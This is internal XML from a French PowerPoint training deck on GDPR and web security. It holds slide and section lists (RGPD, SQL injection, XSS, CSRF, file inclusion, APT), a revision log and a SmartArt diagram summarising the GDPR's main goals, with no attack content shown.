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 id="2147483740" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId96"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="338" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="341" r:id="rId6"/>
    <p:sldId id="346" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="261" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="342" r:id="rId14"/>
    <p:sldId id="344" r:id="rId15"/>
    <p:sldId id="343" r:id="rId16"/>
    <p:sldId id="284" r:id="rId17"/>
    <p:sldId id="345" r:id="rId18"/>
    <p:sldId id="348" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="356" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="267" r:id="rId23"/>
    <p:sldId id="269" r:id="rId24"/>
    <p:sldId id="268" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="270" r:id="rId27"/>
    <p:sldId id="271" r:id="rId28"/>
    <p:sldId id="272" r:id="rId29"/>
    <p:sldId id="273" r:id="rId30"/>
    <p:sldId id="274" r:id="rId31"/>
    <p:sldId id="275" r:id="rId32"/>
    <p:sldId id="276" r:id="rId33"/>
    <p:sldId id="289" r:id="rId34"/>
    <p:sldId id="277" r:id="rId35"/>
    <p:sldId id="278" r:id="rId36"/>
    <p:sldId id="279" r:id="rId37"/>
    <p:sldId id="347" r:id="rId38"/>
    <p:sldId id="357" r:id="rId39"/>
    <p:sldId id="281" r:id="rId40"/>
    <p:sldId id="349" r:id="rId41"/>
    <p:sldId id="283"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290" r:id="rId55"/>
    <p:sldId id="282" r:id="rId56"/>
    <p:sldId id="287" r:id="rId57"/>
    <p:sldId id="358" r:id="rId58"/>
    <p:sldId id="303" r:id="rId59"/>
    <p:sldId id="334" r:id="rId60"/>
    <p:sldId id="339" r:id="rId61"/>
    <p:sldId id="306" r:id="rId62"/>
    <p:sldId id="352" r:id="rId63"/>
    <p:sldId id="333" r:id="rId64"/>
    <p:sldId id="361" r:id="rId65"/>
    <p:sldId id="360" r:id="rId66"/>
    <p:sldId id="305" r:id="rId67"/>
    <p:sldId id="307" r:id="rId68"/>
    <p:sldId id="308" r:id="rId69"/>
    <p:sldId id="310" r:id="rId70"/>
    <p:sldId id="323" r:id="rId71"/>
    <p:sldId id="309" r:id="rId72"/>
    <p:sldId id="311" r:id="rId73"/>
    <p:sldId id="350" r:id="rId74"/>
    <p:sldId id="355" r:id="rId75"/>
    <p:sldId id="313" r:id="rId76"/>
    <p:sldId id="316" r:id="rId77"/>
    <p:sldId id="314" r:id="rId78"/>
    <p:sldId id="351" r:id="rId79"/>
    <p:sldId id="315" r:id="rId80"/>
    <p:sldId id="317" r:id="rId81"/>
    <p:sldId id="353" r:id="rId82"/>
    <p:sldId id="320" r:id="rId83"/>
    <p:sldId id="321" r:id="rId84"/>
    <p:sldId id="354" r:id="rId85"/>
    <p:sldId id="322" r:id="rId86"/>
    <p:sldId id="359" r:id="rId87"/>
    <p:sldId id="332" r:id="rId88"/>
    <p:sldId id="325" r:id="rId89"/>
    <p:sldId id="326" r:id="rId90"/>
    <p:sldId id="327" r:id="rId91"/>
    <p:sldId id="328" r:id="rId92"/>
    <p:sldId id="329" r:id="rId93"/>
    <p:sldId id="330" r:id="rId94"/>
    <p:sldId id="331" r:id="rId9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93ECDE61-14C2-4D15-A136-956EF42D0969}">
          <p14:sldIdLst>
            <p14:sldId id="338"/>
            <p14:sldId id="258"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Généralités" id="{6F74EA28-9021-488F-98F2-5DB964996C6A}">
          <p14:sldIdLst>
            <p14:sldId id="259"/>
            <p14:sldId id="341"/>
            <p14:sldId id="346"/>
            <p14:sldId id="262"/>
            <p14:sldId id="260"/>
            <p14:sldId id="266"/>
            <p14:sldId id="263"/>
            <p14:sldId id="261"/>
            <p14:sldId id="265"/>
            <p14:sldId id="342"/>
            <p14:sldId id="344"/>
            <p14:sldId id="343"/>
            <p14:sldId id="284"/>
            <p14:sldId id="345"/>
            <p14:sldId id="348"/>
            <p14:sldId id="285"/>
            <p14:sldId id="356"/>
            <p14:sldId id="286"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="RGPD" id="{4B402683-406E-4E54-97EB-617CF02ACAD5}">
          <p14:sldIdLst>
            <p14:sldId id="267"/>
            <p14:sldId id="269"/>
            <p14:sldId id="268"/>
            <p14:sldId id="288"/>
            <p14:sldId id="270"/>
            <p14:sldId id="271"/>
            <p14:sldId id="272"/>
            <p14:sldId id="273"/>
            <p14:sldId id="274"/>
            <p14:sldId id="275"/>
            <p14:sldId id="276"/>
            <p14:sldId id="289"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
            <p14:sldId id="279"/>
            <p14:sldId id="347"/>
            <p14:sldId id="357"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Principes de protection des données" id="{2906FFA0-95C9-4B75-9E06-D789DA80EF1F}">
          <p14:sldIdLst>
            <p14:sldId id="281"/>
            <p14:sldId id="349"/>
            <p14:sldId id="283"/>
            <p14:sldId id="291"/>
            <p14:sldId id="292"/>
            <p14:sldId id="293"/>
            <p14:sldId id="294"/>
            <p14:sldId id="295"/>
            <p14:sldId id="296"/>
            <p14:sldId id="297"/>
            <p14:sldId id="298"/>
            <p14:sldId id="299"/>
            <p14:sldId id="300"/>
            <p14:sldId id="301"/>
            <p14:sldId id="302"/>
            <p14:sldId id="290"/>
            <p14:sldId id="282"/>
            <p14:sldId id="287"/>
            <p14:sldId id="358"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="PCDA" id="{53345A0B-BC74-4E8E-BAAF-25AA520C4B90}">
          <p14:sldIdLst>
            <p14:sldId id="303"/>
            <p14:sldId id="334"/>
            <p14:sldId id="339"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Failles Communes" id="{C1F2C0CE-9C9A-44D7-9E39-BC439DAE8F5C}">
          <p14:sldIdLst>
            <p14:sldId id="306"/>
            <p14:sldId id="352"/>
            <p14:sldId id="333"/>
            <p14:sldId id="361"/>
            <p14:sldId id="360"/>
            <p14:sldId id="305"/>
            <p14:sldId id="307"/>
            <p14:sldId id="308"/>
            <p14:sldId id="310"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Initiation Root-me" id="{92FDC968-9815-4A33-93A7-1532B3A5EBD9}">
          <p14:sldIdLst>
            <p14:sldId id="323"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Injection SQL" id="{F8E7D1AC-5F62-4487-B8D3-7E215BBC449C}">
          <p14:sldIdLst>
            <p14:sldId id="309"/>
            <p14:sldId id="311"/>
            <p14:sldId id="350"/>
            <p14:sldId id="355"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Cross-site Scripting" id="{A7DF3E6C-F46A-4CC6-A675-E58C8553A5EE}">
          <p14:sldIdLst>
            <p14:sldId id="313"/>
            <p14:sldId id="316"/>
            <p14:sldId id="314"/>
            <p14:sldId id="351"/>
            <p14:sldId id="315"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Cross-Site Request Forgery" id="{E29DEEB9-CA6B-448C-8946-A379A307C790}">
          <p14:sldIdLst>
            <p14:sldId id="317"/>
            <p14:sldId id="353"/>
            <p14:sldId id="320"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Local Remote File Inclusion" id="{663507C7-F13D-45E1-82AA-39715F5BE0A1}">
          <p14:sldIdLst>
            <p14:sldId id="321"/>
            <p14:sldId id="354"/>
            <p14:sldId id="322"/>
            <p14:sldId id="359"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="APT" id="{E5C9CC3F-6ACF-4117-9802-A769956F549F}">
          <p14:sldIdLst>
            <p14:sldId id="332"/>
            <p14:sldId id="325"/>
            <p14:sldId id="326"/>
            <p14:sldId id="327"/>
            <p14:sldId id="328"/>
            <p14:sldId id="329"/>
            <p14:sldId id="330"/>
            <p14:sldId id="33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65348" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="54" d="100"/>
          <a:sy n="54" d="100"/>
        </p:scale>
        <p:origin x="1805" y="62"/>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viewProps" Target="viewProps.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NCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}"/>
    <pc:docChg chg="delSld modSld modSection">
      <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-11T07:17:01.114" v="34" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-08T07:05:05.071" v="28" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="152200278" sldId="257"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-11T07:17:01.114" v="34" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="491803942" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-11T07:17:01.114" v="34" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="491803942" sldId="308"/>
            <ac:spMk id="2" creationId="{6A590F21-A5BA-477C-9A35-42D4375D745E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:39.638" v="29" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4230107956" sldId="309"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:39.638" v="29" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1490107064" sldId="311"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:45.966" v="30" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4042856514" sldId="313"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:45.966" v="30" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3918541353" sldId="314"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:45.966" v="30" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1896011201" sldId="315"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:45.966" v="30" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="775056577" sldId="316"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:52.111" v="31" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1208211551" sldId="317"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:52.111" v="31" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3984692535" sldId="320"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:59.430" v="32" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="59388123" sldId="321"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:59.430" v="32" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="657833582" sldId="322"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-08T07:04:52.554" v="26" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1718834256" sldId="338"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-08T07:04:52.554" v="26" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1718834256" sldId="338"/>
            <ac:spMk id="3" creationId="{6088BA4B-464B-7FFA-DCC7-DC19EB2A9A88}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-08T07:04:59.539" v="27" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2339750437" sldId="340"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:39.638" v="29" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="581267956" sldId="350"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:45.966" v="30" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2673776088" sldId="351"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:52.111" v="31" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="907480824" sldId="353"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:59.430" v="32" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3307659159" sldId="354"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:39.638" v="29" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3928612568" sldId="355"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="VINCHENT Thibault" userId="b919e929-cfef-445e-a456-a3c1568e08ff" providerId="ADAL" clId="{771EB02C-BB5D-4408-BEC2-75306011F50D}" dt="2024-07-09T15:23:59.430" v="32" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2531523453" sldId="35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245D88-436C-44C9-AD97-02243E95475D}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent3_3" csCatId="accent3" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90C2E96C-179B-4D25-8BBA-4344D19330D1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="002060"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Garantir la protection de la vie privée et des libertés</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" dirty="0">
            <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5C278B2-0386-42C7-B8B4-92E6576FB707}" type="parTrans" cxnId="{92EB0BF0-F0D0-4DED-98A3-6EFF5042FBC1}">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9BAF64DC-1C5E-4D6B-A045-2508BFF24546}" type="sibTrans" cxnId="{92EB0BF0-F0D0-4DED-98A3-6EFF5042FBC1}">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1A48FE5A-B9CD-429C-8784-49DC90F88E78}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="0070C0"/>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="fr-FR" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>3 Axes majeurs du RGPD</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" dirty="0">
            <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAA5E8FF-1C06-4A40-A1EA-19550E346D8A}" type="parTrans" cxnId="{B860CC42-4167-4342-905A-D2DFF1D9BAA0}">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B8056A98-4A78-4325-830A-C6C40EBEA448}" type="sibTrans" cxnId="{B860CC42-4167-4342-905A-D2DFF1D9BAA0}">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87983F37-C049-4C41-AE0C-63B7BE01E284}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buClr>
              <a:srgbClr val="0070C0"/>
            </a:buClr>
            <a:buSzPct val="70000"/>
            <a:buFont typeface="+mj-lt"/>
            <a:buAutoNum type="arabicPeriod"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Renforcer les pouvoirs de sanction des autorités</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{656D72F8-722E-4C06-B5BC-592063051C71}" type="parTrans" cxnId="{7D2B9331-DCBF-4E69-82D0-F76AFBC1D1C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{362C62A1-1194-4CFD-9EF5-4DFBC82A9487}" type="sibTrans" cxnId="{7D2B9331-DCBF-4E69-82D0-F76AFBC1D1C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A96AAEF-09F6-4B5C-966E-1CE81F135A30}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buClr>
              <a:srgbClr val="0070C0"/>
            </a:buClr>
            <a:buSzPct val="70000"/>
            <a:buFont typeface="+mj-lt"/>
            <a:buAutoNum type="arabicPeriod"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Responsabiliser les acteurs de traitements des données</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{874E4BB3-2685-4467-A418-169124D32292}" type="parTrans" cxnId="{B158BE0F-C605-498E-AFDF-760769FC8FF3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A843B338-FEB0-4004-8D34-FC80DCCC2B5E}" type="sibTrans" cxnId="{B158BE0F-C605-498E-AFDF-760769FC8FF3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{57289B70-76C5-480C-9B6A-E36867FD937C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buClr>
              <a:srgbClr val="0070C0"/>
            </a:buClr>
            <a:buSzPct val="70000"/>
            <a:buFont typeface="+mj-lt"/>
            <a:buAutoNum type="arabicPeriod"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2800" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> Renforcer les droits des personnes</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="2800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC3E65AD-0DF3-48E6-9441-B560E8D289AC}" type="parTrans" cxnId="{74BD6E9F-37C2-4D9B-9D77-0A462AB9B033}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEAA329C-7356-4A85-AF74-4D5CD6912203}" type="sibTrans" cxnId="{74BD6E9F-37C2-4D9B-9D77-0A462AB9B033}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="fr-FR"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A07E26D-A821-4E14-B1F6-3D9D9140E1A3}" type="pres">
      <dgm:prSet presAssocID="{31245D88-436C-44C9-AD97-02243E95475D}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36302A27-19A1-4123-AEED-C46611F78B12}" type="pres">
      <dgm:prSet presAssocID="{90C2E96C-179B-4D25-8BBA-4344D19330D1}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4634D215-6AD4-43E3-8B51-F6433B108538}" type="pres">
      <dgm:prSet presAssocID="{9BAF64DC-1C5E-4D6B-A045-2508BFF24546}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ECC983E3-4951-465C-BAE4-F5B4BB7AC23B}" type="pres">
      <dgm:prSet presAssocID="{1A48FE5A-B9CD-429C-8784-49DC90F88E78}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78347299-E708-491B-8657-BD8E81843046}" type="pres">
      <dgm:prSet presAssocID="{1A48FE5A-B9CD-429C-8784-49DC90F88E78}" presName="childText" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="1">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E9AC3405-ED29-45F5-9B40-5A422D88DCDA}" type="presOf" srcId="{1A48FE5A-B9CD-429C-8784-49DC90F88E78}" destId="{ECC983E3-4951-465C-BAE4-F5B4BB7AC23B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
